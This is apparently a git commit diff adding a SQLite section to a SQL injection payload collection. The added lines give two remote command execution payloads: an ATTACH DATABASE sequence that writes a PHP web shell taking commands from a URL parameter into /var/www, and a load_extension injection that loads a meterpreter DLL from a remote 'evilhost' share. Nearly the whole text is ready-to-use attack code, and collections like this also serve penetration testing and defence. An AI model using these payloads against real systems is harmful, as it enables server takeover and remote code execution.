SQL injections payloads separated + OAuth

2026-01-03 08:17:11 -08:00 · 2016-11-29 23:27:35 +07:00
parent 2fa9683b8c
commit 7d67aa4e0d
8 changed files with 212 additions and 173 deletions
--- a/injection/SQLite
+++ b/injection/SQLite
@@ -0,0 +1,14 @@
+# SQLite
+
+##Remote Command Execution using SQLite command - Attach Database
+```
+ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
+CREATE TABLE lol.pwn (dataz text);
+INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
+```
+
+##Remote Command Execution using SQLite command - Load_extension
+```
+UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
+```
+Note: By default this component is disabled